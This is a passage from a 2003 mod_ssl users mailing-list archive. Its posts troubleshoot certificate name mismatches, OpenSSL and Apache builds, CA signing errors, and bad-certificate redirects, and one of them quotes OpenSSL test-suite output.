depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
In app_verify_callback, allowing cert. Arg is: Test Callback Argument
Finished printing do we have a context? 0x1fffcfb8 a cert? 0x400fe640
cert depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2

--Boundary_(ID_Djye1HMUmNmPze37iMbfug)--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 15:25:03 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 145B62AA0D1; Wed, 29 Jan 2003 15:25:03 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id A138D2AA0C3
	for ; Wed, 29 Jan 2003 15:25:01 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0TEOvi16409
	for ; Wed, 29 Jan 2003 15:24:57 +0100 (MET)
Message-ID: <3E37E438.3070309@fokus.fraunhofer.de>
Date: Wed, 29 Jan 2003 15:24:56 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does NOT match server name!?
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Owen,

thanks again for your mail.

>>>PLease post in plain text - my mail client doesn't handle HTML mail...
>>>
>>>The thing you type into the browser's Location window has to match
>>>what's in the cert. Does it? 
>>>
>>Yes, it does. but this error "[warn] RSA server certificate 
>>CommonName (CN)
>>does NOT match server name!?" is given during the HTTPS server start. 
>>and the next step is to start the browser.
>>
>
>In your httpd.conf you must have a ServerName directive - what is it set to? It must be the same as the common name in the cert.
>
It is set to "yin.fokus.gmd.de" which is the same as the common name in 
the cert.
I have got this error during HTTP Secure Server start, and this step 
happens before typing something in browser!

>>>if you are doing all this on a standalone
>>>laptop, I doubt it.
>>>
>>Could you tell me the reason?  what do you mean "standalone"? 
>>The laptop get
>>it's IP address during reboot using DHCP.
>>
>
>So how do you access the web site? You must type something into the browser - unless you type yin.fokus.gmd.de, you will get a warning. But how can you type this in?  - you would need a local DNS set up to resolve this domain. Do you have this?
>
I'm sorry that I don't understand what you mean! But I think my laptop 
can local understand the mapping
betweem IP address and host name "yin.fokus.gmd.de". The browser works 
well if I now type
"http://yin.fokus.gmd.de", but does not work "https://yin.fokus.gmd.de"!
I think I can only start the HTTP server because there are the following 
message in the error_log file :
---->
[warn] RSA server certificate CommonName (CN) `yin.fokus.gmd.de' does 
NOT match server name!?
Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6g DAV/2 configured -- 
resuming normal operations
<---

Best Regards,
Aihong Yin.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 29 17:51:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1B3142AA0CF; Wed, 29 Jan 2003 17:51:26 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 256522AA0B7
	for ; Wed, 29 Jan 2003 17:51:19 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id BAB5C31D77; Wed, 29 Jan 2003 08:51:50 -0800 (PST)
Date: Wed, 29 Jan 2003 08:51:50 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: new to Apache-SSL world needs help
Message-ID: <20030129165150.GA5635@rawbyte.com>
References: <1F6B1C04A612D311B27400A0C9ECE51202A1C3E3@NAWNT02.naples.eur.slb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <1F6B1C04A612D311B27400A0C9ECE51202A1C3E3@NAWNT02.naples.eur.slb.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> At this point I have to customize http.conf and ssl.conf files.
> Could you send me an example of such files already modified? I need to
> understand what I must change.

You can take a look at 
http://apacheworld.org/ty24/site.chapter17.html

for building instructions and example minimal configuration.
Notice that you also need to pass --enable-ssl whem building,
that should crete a sample ssl.conf file in the conf directory

Cheers

Daniel

On Wed, Jan 29, 2003 at 02:43:06PM +0100, Zampognaro Sergio wrote:
> Hi all,
> I need to migrate a web site from http to secure https. Mine is a Digital
> UNIX V4.0F  (Rev. 1229) server.
> 
> I downloaded following packages:
>  - openssl-0.9.7
>  - httpd-2.0.44
> 
> 
> 1) openssl installation - steps performed:
> 
> ./config --prefix=/home/aspprod/aspapp/mySSL/openSSL
> 
> make
> 	I got this warnings on stderr:
> 	ar: Warning: creating ../libcrypto.a
> 	ar: Warning: creating ../libssl.a
> 
> make test
> 	On stderr I got this messages contained in attached fiel:
> errore3.txt
> 
> make install
> 	I got this messages on stderr:
> 	./pod2mantest: pod2man: not found
> 	pod2man does not work properly ('BasicTest' failed).  Looking for
> another pod2man ...
> 	No working pod2man found.  Consider installing a new version.
> 	As a workaround, we'll use a bundled old copy of pod2man.pl.
> 
> First of all do you think all this warnings are fatal for my openssl
> installation?
> 
> 2) apache2 installation - steps performed:
> 
> ./configure --prefix=/home/aspprod/aspapp/mySSL/apache2
> --with=/home/aspprod/aspapp/mySSL/openSSL
> 
> make
> 	I got a lot of warnings on stderr!
> 
> make install
> 
> At this point I have to customize http.conf and ssl.conf files.
> Could you send me an example of such files already modified? I need to
> understand what I must change.
> 
> thanks in advance!
> Sergio
> 
> > ________________________________________
> >                                                          SchlumbergerSema
> ing. Sergio Zampognaro
> System Integration - SMA
> Via Antiniana 2A - 80078 Pozzuoli (NA) - ITALY
> > Mobile*+39 335 131 54 26
> > Phone *  +39 081 6103 483
> > Fax      6   +39 081 6103 200		
> > e-mail *  SZampognaro@naples.sema.slb.com
> > 
> This email is confidential and intended solely for the use of the individual
> to whom it is addressed. Any views or opinions presented are solely those of
> the author and do not necessarily represent those of SchlumbergerSema SpA.
> If you are not the intended recipient, be advised that you have received
> this email in error and that any use, dissemination, forwarding, printing,
> or copying of this email is strictly prohibited.
> If you have received this email in error please notify the SchlumbergerSema
> Helpdesk, by telephone on +39.0125.810500 or by e-mail on
> helpdesk@semagroup.it
> 
> 
> 
> 

> test BN_add
> test BN_sub
> test BN_lshift1
> test BN_lshift (fixed)
> test BN_lshift
> test BN_rshift1
> test BN_rshift
> test BN_sqr
> test BN_mul
> test BN_div
> test BN_div_recp
> test BN_mod
> test BN_mod_mul
> test BN_mont
> test BN_mod_exp
> test BN_exp
> test BN_kronecker
> ..............++++++
> ....................................................................................................
> test BN_mod_sqrt
> .....
> .....
> .....
> .....
> .....
> .....
> .....
> .....
> .......++++++++++++
> .....
> .....++++++++++++
> .....
> ...............++++++++++++
> .....
> ..++++++++++++
> .....
> ...++++++++++++
> .....
> ...++++++++++++
> .....
> ....................++++++++++++
> .....
> .......++++++++++++
> .....
> bc does not work properly ('SunOStest' failed).  Looking for another bc ...
> /usr/bin/bc does not work properly ('SunOStest' failed).  Looking for another bc ...
> No working bc found.  Consider installing GNU bc.
> 
> 0 tests passed
> Generating a 512 bit RSA private key
> .++++++++++++
> ....++++++++++++
> writing new private key to 'testkey.pem'
> -----
> You are about to be asked to enter information that will be incorporated
> into your certificate request.
> What you are about to enter is what is called a Distinguished Name or a DN.
> There are quite a few fields but you can leave some blank
> For some fields there will be a default value,
> If you enter '.', the field will be left blank.
> -----
> Country Name (2 letter code) [AU]:AU
> State or Province Name (full name) [Queensland]:
> Locality Name (eg, city) []:Brisbane
> Organization Name (eg, company) []:CryptSoft Pty Ltd
> Organizational Unit Name (eg, section) []:.
> Common Name (eg, YOUR name) []:Eric Young
> Email Address []:eay@mincom.oz.au
> verify OK
> test generation of DSA parameters
> .++++++++++++++++++++++++++++++++++++++++++++++++++*
> ...+........+..+...+............+.+..+..........................................................................++++++++++++++++++++
> +++++++++++++++++++++++++++++++*
> seed
> D5014E4B 60EF2BA8 B6211B40 62BA3224 E0427DD3 
> counter=105 h=2
> P:   
>     00:8d:f2:a4:94:49:22:76:aa:3d:25:75:9b:b0:68:
>     69:cb:ea:c0:d8:3a:fb:8d:0c:f7:cb:b8:32:4f:0d:
>     78:82:e5:d0:76:2f:c5:b7:21:0e:af:c2:e9:ad:ac:
>     32:ab:7a:ac:49:69:3d:fb:f8:37:24:c2:ec:07:36:
>     ee:31:c8:02:91
> Q:   
>     00:c7:73:21:8c:73:7e:c8:ee:99:3b:4f:2d:ed:30:
>     f4:8e:da:ce:91:5f
> G:   
>     62:6d:02:78:39:ea:0a:13:41:31:63:a5:5b:4c:b5:
>     00:29:9d:55:22:95:6c:ef:cb:3b:ff:10:f3:99:ce:
>     2c:2e:71:cb:9d:e5:fa:24:ba:bf:58:e5:b7:95:21:
>     92:5c:9c:c4:2e:9f:6f:46:4b:08:8c:c5:72:af:53:
>     e6:d7:88:02
> test generation of DSA parameters
> .++++++++++++++++++++++++++++++++++++++++++++++++++*
> ...+........+..+...+............+.+..+..........................................................................++++++++++++++++++++
> +++++++++++++++++++++++++++++++*
> seed
> D5014E4B 60EF2BA8 B6211B40 62BA3224 E0427DD3 
> counter=105 h=2
> P:   
>     00:8d:f2:a4:94:49:22:76:aa:3d:25:75:9b:b0:68:
>     69:cb:ea:c0:d8:3a:fb:8d:0c:f7:cb:b8:32:4f:0d:
>     78:82:e5:d0:76:2f:c5:b7:21:0e:af:c2:e9:ad:ac:
>     32:ab:7a:ac:49:69:3d:fb:f8:37:24:c2:ec:07:36:
>     ee:31:c8:02:91
> Q:   
>     00:c7:73:21:8c:73:7e:c8:ee:99:3b:4f:2d:ed:30:
>     f4:8e:da:ce:91:5f
> G:   
>     62:6d:02:78:39:ea:0a:13:41:31:63:a5:5b:4c:b5:
>     00:29:9d:55:22:95:6c:ef:cb:3b:ff:10:f3:99:ce:
>     2c:2e:71:cb:9d:e5:fa:24:ba:bf:58:e5:b7:95:21:
>     92:5c:9c:c4:2e:9f:6f:46:4b:08:8c:c5:72:af:53:
>     e6:d7:88:02
> Generating a 512 bit RSA private key
> ...........++++++++++++
> ................++++++++++++
> writing new private key to 'keyCA.ss'
> -----
> You are about to be asked to enter information that will be incorporated
> into your certificate request.
> What you are about to enter is what is called a Distinguished Name or a DN.
> There are quite a few fields but you can leave some blank
> For some fields there will be a default value,
> If you enter '.', the field will be left blank.
> -----
> Country Name (2 letter code) [AU]:AU
> Organization Name (eg, company) []:Dodgy Brothers
> Common Name (eg, YOUR name) []:Dodgy CA
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Consider setting the RANDFILE environment variable to point at a file that
> 'random' data can be kept in (the file will be overwritten).
> Signature ok
> subject=/C=AU/O=Dodgy Brothers/CN=Dodgy CA
> Getting Private key
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Consider setting the RANDFILE environment variable to point at a file that
> 'random' data can be kept in (the file will be overwritten).
> Getting request Private Key
> Generating certificate request
> verify OK
> verify OK
> Generating a 512 bit RSA private key
> ................++++++++++++
> .............................++++++++++++
> writing new private key to 'keyU.ss'
> -----
> You are about to be asked to enter information that will be incorporated
> into your certificate request.
> What you are about to enter is what is called a Distinguished Name or a DN.
> There are quite a few fields but you can leave some blank
> For some fields there will be a default value,
> If you enter '.', the field will be left blank.
> -----
> Country Name (2 letter code) [AU]:AU
> Organization Name (eg, company) []:Dodgy Brothers
> Common Name (eg, YOUR name) []:Brother 1
> Common Name (eg, YOUR name) []:Brother 2
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Consider setting the RANDFILE environment variable to point at a file that
> 'random' data can be kept in (the file will be overwritten).
> Signature ok
> subject=/C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> Getting CA Private Key
> Generating a 512 bit RSA private key
> .............++++++++++++
> ...........................++++++++++++
> writing new private key to './demoCA/private/./cakey.pem'
> -----
> You are about to be asked to enter information that will be incorporated
> into your certificate request.
> What you are about to enter is what is called a Distinguished Name or a DN.
> There are quite a few fields but you can leave some blank
> For some fields there will be a default value,
> If you enter '.', the field will be left blank.
> -----
> Country Name (2 letter code) [AU]:AU
> Organization Name (eg, company) []:Dodgy Brothers
> Common Name (eg, YOUR name) []:Dodgy CA
> Generating a 512 bit RSA private key
> ............................................++++++++++++
> ..++++++++++++
> writing new private key to 'newreq.pem'
> -----
> You are about to be asked to enter information that will be incorporated
> into your certificate request.
> What you are about to enter is what is called a Distinguished Name or a DN.
> There are quite a few fields but you can leave some blank
> For some fields there will be a default value,
> If you enter '.', the field will be left blank.
> -----
> Country Name (2 letter code) [AU]:AU
> Organization Name (eg, company) []:Dodgy Brothers
> Common Name (eg, YOUR name) []:Brother 1
> Common Name (eg, YOUR name) []:Brother 2
> Using configuration from ../apps/openssl.cnf
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Check that the request matches the signature
> Signature ok
> Certificate Details:
>         Serial Number: 1 (0x1)
>         Validity
>             Not Before: Jan 29 10:47:46 2003 GMT
>             Not After : Jan 29 10:47:46 2004 GMT
>         Subject:
>             countryName               = AU
>             organizationName          = Dodgy Brothers
>             commonName                = Brother 1
>             commonName                = Brother 2
>         X509v3 extensions:
>             X509v3 Basic Constraints: 
>             CA:FALSE
>             Netscape Comment: 
>             OpenSSL Generated Certificate
>             X509v3 Subject Key Identifier: 
>             66:F5:59:18:BA:EA:16:D6:6E:05:27:D7:A7:6D:11:88:D0:FA:C3:26
>             X509v3 Authority Key Identifier: 
>             DirName:/C=AU/O=Dodgy Brothers/CN=Dodgy CA
>             serial:00
> 
> Certificate is to be certified until Jan 29 10:47:46 2004 GMT (365 days)
> Sign the certificate? [y/n]:
> 
> 1 out of 1 certificate requests certified, commit? [y/n]Write out database with 1 new entries
> Data Base Updated
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> client authentication
> server authentication
> depth=1 /C=AU/O=Dodgy Brothers/CN=Dodgy CA
> depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2
> In app_verify_callback, allowing cert. Arg is: Test Callback Argument
> Finished printing do we have a context? 0x1fffcfb8 a cert? 0x400fe640
> cert depth=0 /C=AU/O=Dodgy Brothers/CN=Brother 1/CN=Brother 2

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 11:51:29 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1537A2AA0A2; Thu, 30 Jan 2003 11:51:29 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub.fokus.gmd.de (mailhub.fokus.gmd.de [193.174.154.14])
	by master.modssl.org (Postfix) with ESMTP id 720312AA09E
	for ; Thu, 30 Jan 2003 11:51:27 +0100 (CET)
Received: from fokus.fraunhofer.de (sol [193.174.154.20])
	by mailhub.fokus.gmd.de (8.11.6/8.11.6) with ESMTP id h0UApKi13062
	for ; Thu, 30 Jan 2003 11:51:20 +0100 (MET)
Message-ID: <3E3903A8.20709@fokus.fraunhofer.de>
Date: Thu, 30 Jan 2003 11:51:20 +0100
From: Aihong Yin 
Organization: FOKUS
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020406 Netscape6/6.2.2
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [warn] RSA server certificate CommonName (CN) `yin.*' does NOT match server name!?
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aihong Yin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Owen,

After I have set ServerName in the ssl.conf file to "yin.fokus.gmd.de",
this error "[warn] RSA server certificate CommonName (CN)
`yin.fokus.gmd.de' does NOT match server name!?"does not exist in file 
error_log.
It seems that I can start HTTP secure server ... ( I think that I have
 misunderstood your first mail below, I have only changed the ServerName
in the file httpd.conf.)

But now when I type "https://yin.fokus.gmd.de" in my browser, and I got
the error message in Browser .
------>

The server's certificate has an invalid signature. 
You will not be able to connect to this site securely.
<------

The following is the massage in error_log file.
---->
[Thu Jan 30 10:08:50 2003] [notice] Digest: generating secret for digest 
authentication ...
[Thu Jan 30 10:08:50 2003] [notice] Digest: done
[Thu Jan 30 10:08:52 2003] [notice] Apache/2.0.43 (Unix) mod_ssl/2.0.43 
OpenSSL/0.9.6g DAV/2 configured -- resuming normal operations
[Thu Jan 30 10:09:11 2003] [error] SSL handshake failed (server 
yin.fokus.gmd.de:443, client 195.37.78.101)
[Thu Jan 30 10:09:11 2003] [error] SSL Library Error: 336151570 
error:14094412:lib(20):func(148):reason(1042)
<----

Thanks for any help.

Best regards,
Aihong Yin.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 11:58:18 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 525E22AA0A2; Thu, 30 Jan 2003 11:58:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta02.montrouge.eur.slb.com [163.187.152.23])
	by master.modssl.org (Postfix) with ESMTP id B5FDB2AA09E
	for ; Thu, 30 Jan 2003 11:58:12 +0100 (CET)
Received: from conversion-daemon.eurmta02.montrouge.eur.slb.com by
 eurmta02.montrouge.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0H9I00201VQK2E@eurmta02.montrouge.eur.slb.com> for
 modssl-users@modssl.org; Thu, 30 Jan 2003 10:47:51 +0000 (GMT)
Received: from nawnt02.naples.eur.slb.com
 (NAWNT02.naples.eur.slb.com [134.32.195.212])
 by eurmta02.montrouge.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0H9I00BMNWNEGY@eurmta02.montrouge.eur.slb.com> for
 modssl-users@modssl.org; Thu, 30 Jan 2003 10:47:43 +0000 (GMT)
Received: by NAWNT02.naples.eur.slb.com with Internet Mail Service
 (5.5.2653.19)	id ; Thu, 30 Jan 2003 11:47:06 +0100
Content-return: allowed
Date: Thu, 30 Jan 2003 11:46:57 +0100
From: Zampognaro Sergio 
Subject: autosigning certificate
To: modssl-users@modssl.org
Message-id:
 <1F6B1C04A612D311B27400A0C9ECE51202A1CAB1@NAWNT02.naples.eur.slb.com>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Importance: high
X-Priority: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,
I tried to use my own CA in order to sign the CSR previously produced.
Following what I got:

[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin> ./sign.sh
server.csr
CA signing: server.csr -> server.crt:
Using configuration from ca.config
Enter pass phrase for ./ca.key:
Check that the request matches the signature
Signature ok
The Subject's Distinguished Name is as follows
countryName           :PRINTABLE:'IT'
stateOrProvinceName   :PRINTABLE:'Napoli'
localityName          :PRINTABLE:'Pozzuoli'
organizationName      :PRINTABLE:'SchlumbergerSema'
organizationalUnitName:PRINTABLE:'EAI'
commonName            :PRINTABLE:'naunx04:8443'
emailAddress          :IA5STRING:'szampognaro@slb.com'
Certificate is to be certified until Jan 29 17:29:55 2004 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt:
/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailAd
dress=szampognaro@slb.com
error 18 at 0 depth lookup:self signed certificate
/C=IT/ST=Napoli/L=Pozzuoli/O=SchlumbergerSema/OU=EAI/CN=naunx04:8443/emailAd
dress=szampognaro@slb.com
error 7 at 0 depth lookup:certificate signature failure
[naunx04:aspprod] /home/aspprod/aspapp/mySSL/openSSL/bin>

I see 2 ERRORS:
error 18 at 0 depth lookup:self signed certificate
error 7 at 0 depth lookup:certificate signature failure

What they means? The certificate signing process is ok or not?

Many thanks.
Sergio.

> ________________________________________
>                                                          SchlumbergerSema
ing. Sergio Zampognaro
System Integration - SMA
Via Antiniana 2A - 80078 Pozzuoli (NA) - ITALY
> Mobile*+39 335 131 54 26
> Phone *  +39 081 6103 483
> Fax      6   +39 081 6103 200		
> e-mail *  SZampognaro@naples.sema.slb.com
> 
This email is confidential and intended solely for the use of the individual
to whom it is addressed. Any views or opinions presented are solely those of
the author and do not necessarily represent those of SchlumbergerSema SpA.
If you are not the intended recipient, be advised that you have received
this email in error and that any use, dissemination, forwarding, printing,
or copying of this email is strictly prohibited.
If you have received this email in error please notify the SchlumbergerSema
Helpdesk, by telephone on +39.0125.810500 or by e-mail on
helpdesk@semagroup.it
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 18:35:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9E27E2AA0A2; Thu, 30 Jan 2003 18:35:26 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from vil.com.ua (vil.com.ua [193.109.102.42])
	by master.modssl.org (Postfix) with ESMTP id 859E62AA09E
	for ; Thu, 30 Jan 2003 18:35:19 +0100 (CET)
Received: from homecomp ([217.196.168.155])
	by vil.com.ua (8.12.6/8.12.5) with SMTP id h0UHZ33l058665
	for ; Thu, 30 Jan 2003 19:35:08 +0200 (EET)
	(envelope-from olebedew@vil.com.ua)
Message-ID: <000901c2c886$1b2c0dc0$9ba8c4d9@homecomp>
From: "Oleg Lyebyedyev" 
To: 
References:  <1F6B1C04A612D311B27400A0C9ECE51202A1CAB1@NAWNT02.naples.eur.slb.com>
Subject: Redirection on bad cert
Date: Thu, 30 Jan 2003 19:36:15 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Oleg Lyebyedyev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,

Is it possible to redirect user with bad cert to other page?
As I understand, server doesn't return any error code after ssl error on
expired cert. Therefore, ErrorDocument directive doesn,t work.

Thank You
Oleg Lebedev


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 30 19:10:06 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5D8C32AA0A2; Thu, 30 Jan 2003 19:10:06 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from atlrel8.hp.com (atlrel8.hp.com [156.153.255.206])
	by master.modssl.org (Postfix) with ESMTP id AFB5D2AA081
	for ; Thu, 30 Jan 2003 19:10:00 +0100 (CET)
Received: from harbour.india.hp.com (harbour.india.hp.com [15.76.114.31])
	by atlrel8.hp.com (Postfix) with ESMTP id ECC031C00CAE
	for ; Thu, 30 Jan 2003 13:09:50 -0500 (EST)
Received: from india.hp.com (nt45170.india.hp.com [15.10.45.170]) by harbour.india.hp.com with ESMTP (8.8.6 (PHNE_17190)/8.8.6 SMKit7.02) id XAA09723 for ; Thu, 30 Jan 2003 23:56:23 +0530 (IST)
Message-ID: <3E396966.6BB5D618@india.hp.com>
Date: Thu, 30 Jan 2003 23:35:26 +0530
From: Anbuchezhian 
Organization: HP
X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Failed to enable Crypto Device API
